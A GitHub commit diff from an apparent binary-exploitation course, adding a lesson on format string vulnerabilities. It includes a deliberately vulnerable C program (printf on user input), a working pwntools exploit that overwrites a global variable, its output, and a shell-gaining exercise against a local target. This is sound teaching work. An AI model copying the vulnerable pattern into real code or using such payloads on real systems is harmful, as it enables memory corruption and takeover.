Skip to content

Commit 7fc3931

Browse files
committed
Finished!
1 parent f70fbae commit 7fc3931

File tree

16 files changed

+368
-3
lines changed

16 files changed

+368
-3
lines changed

lessons/10_bypass_got/lessonplan.md

Lines changed: 2 additions & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -385,7 +385,8 @@ It was compiled with a stack canary.
385385
386386
`gcc -m32 -znoexecstack -o ./build/2_event1 ./src/2_event1.c`
387387
388-
The binary can be [found here][1] and the source can be [found here][2].
388+
The binary can be [found here][1] and the source can be [found here][2]. The
389+
remote target is `nc localhost 1902`.
389390
390391
[1]: ./build/2_event1
391392
[2]: ./src/2_event1.c

lessons/13_fmt_str/Makefile

Lines changed: 4 additions & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -1,4 +1,7 @@
1-
all: 3_echo
1+
all: 2_overwrite 3_echo
2+
3+
2_overwrite:
4+
gcc -m32 -o ./build/2_overwrite ./src/2_overwrite.c
25

36
3_echo:
47
gcc -m32 -znoexecstack -o ./build/3_echo ./src/3_echo.c

lessons/13_fmt_str/build/1_lottery

7.14 KB
Binary file not shown.

lessons/13_fmt_str/build/2_overwrite

7.33 KB
Binary file not shown.

lessons/13_fmt_str/lessonplan.md

Lines changed: 115 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -1 +1,116 @@
11
# Format String Vulnerabilties
2+
3+
Yes, I know this is a really cliche topic but I am just covering one cool thing
4+
that you can do with pwntools. That's all, I promise. Now, we will be looking at
5+
this simple program that is vulnerable to a format string attack. The idea is to
6+
modify the token so that it contains 0xcafebabe when the check occurs.
7+
8+
```c
9+
#include <stdio.h>
10+
#include <stdlib.h>
11+
12+
unsigned int token = 0xdeadbeef;
13+
14+
int main() {
15+
char buffer[200];
16+
scanf("%199s", buffer);
17+
printf(buffer);
18+
printf("\nToken = 0x%x\n", token);
19+
if (token == 0xcafebabe) {
20+
puts("Winner!");
21+
}
22+
else {
23+
puts("Loser!");
24+
}
25+
}
26+
```
27+
28+
So after playing around with the program, we figure out that the first format
29+
argument we control is at offset 5.
30+
31+
```shell
32+
ubuntu@ubuntu-xenial:/vagrant/lessons/13_fmt_str/scripts$ ../build/2_overwrite
33+
AAAA%5$x
34+
AAAA41414141
35+
Token = 0xdeadbeef
36+
Loser!
37+
```
38+
39+
Next, we need the address of the token.
40+
41+
```shell
42+
ubuntu@ubuntu-xenial:/vagrant/lessons/13_fmt_str/scripts$ nm ../build/2_overwrite | grep token
43+
0804a028 D token
44+
```
45+
46+
Now we can write our exploit script. Pwntools actually has a format string
47+
attack generator so we can beat the binary in a few quick easy lines.
48+
49+
```python
50+
#!/usr/bin/python
51+
52+
from pwn import *
53+
54+
token_addr = 0x0804a028
55+
56+
def main():
57+
p = process("../build/2_overwrite")
58+
payload = fmtstr_payload(5, {token_addr: 0xcafebabe})
59+
log.info("Sending payload: %s" % payload)
60+
p.sendline(payload)
61+
62+
data = p.recvall()
63+
realdata = data[data.find("Token"):]
64+
log.success(realdata)
65+
66+
if __name__ == "__main__":
67+
main()
68+
```
69+
70+
Running the program.
71+
72+
```shell
73+
ubuntu@ubuntu-xenial:/vagrant/lessons/13_fmt_str/scripts$ python 1_overwrite_token.py
74+
[+] Starting local process '../build/2_overwrite': Done
75+
[*] Sending payload: (�)�*�+�%174c%5$hhn%252c%6$hhn%68c%7$hhn%204c%8$hhn
76+
[▁] Receiving all data: 0B
77+
[+] Receiving all data: Done (742B)
78+
[+] Token = 0xcafebabe
79+
Winner!
80+
```
81+
82+
## Exercises
83+
84+
### Ex 13.1: Echoes
85+
86+
Before you continue onto the more advanced exercises, here's something to
87+
tackle. The source code to this challenge is given:
88+
89+
```c
90+
#include <stdlib.h>
91+
#include <stdio.h>
92+
#include <unistd.h>
93+
94+
int main() {
95+
setvbuf(stdin, NULL, _IONBF, 0);
96+
setvbuf(stdout, NULL, _IONBF, 0);
97+
char echoed[1000] = {0};
98+
char number[200];
99+
int times;
100+
int i;
101+
while (1) {
102+
read(0, echoed, 999);
103+
puts("How many times do you want it echoed?");
104+
scanf("%199s", number);
105+
times = atoi(number);
106+
for (i = 0; i < times; i++) {
107+
printf(echoed);
108+
}
109+
}
110+
}
111+
```
112+
113+
The binary to the exercise can be found [here][1]. The remote target is `nc
114+
localhost 1903` and the goal is to get a shell.
115+
116+
[1]: ./build/3_echo
Lines changed: 18 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,18 @@
1+
#!/usr/bin/python
2+
3+
from pwn import *
4+
5+
token_addr = 0x0804a028
6+
7+
def main():
8+
p = process("../build/2_overwrite")
9+
payload = fmtstr_payload(5, {token_addr: 0xcafebabe})
10+
log.info("Sending payload: %s" % payload)
11+
p.sendline(payload)
12+
13+
data = p.recvall()
14+
realdata = data[data.find("Token"):]
15+
log.success(realdata)
16+
17+
if __name__ == "__main__":
18+
main()

lessons/13_fmt_str/src/1_lottery.c

Lines changed: 7 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,7 @@
1+
#include <stdio.h>
2+
#include <stdlib.h>
3+
4+
5+
int main() {
6+
7+
}

lessons/13_fmt_str/src/2_overwrite.c

Lines changed: 17 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,17 @@
1+
#include <stdio.h>
2+
#include <stdlib.h>
3+
4+
unsigned int token = 0xdeadbeef;
5+
6+
int main() {
7+
char buffer[200];
8+
scanf("%199s", buffer);
9+
printf(buffer);
10+
printf("\nToken = 0x%x\n", token);
11+
if (token == 0xcafebabe) {
12+
puts("Winner!");
13+
}
14+
else {
15+
puts("Loser!");
16+
}
17+
}

lessons/8_aslr/Makefile

Lines changed: 7 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,7 @@
1+
all: 1_reveal_addresses
2+
3+
1_reveal_addresses:
4+
gcc -m32 -o ./build/1_reveal_addresses ./src/1_reveal_addresses.c -ldl
5+
gcc -o ./build/2_reveal_addresses64 ./src/1_reveal_addresses.c -ldl
6+
gcc -m32 -o ./build/3_reveal_addresses_pie ./src/1_reveal_addresses.c -ldl -pie
7+
gcc -o ./build/4_reveal_addresses64_pie ./src/1_reveal_addresses.c -ldl -pie -fPIC
7.4 KB
Binary file not shown.

0 commit comments

Comments
 (0)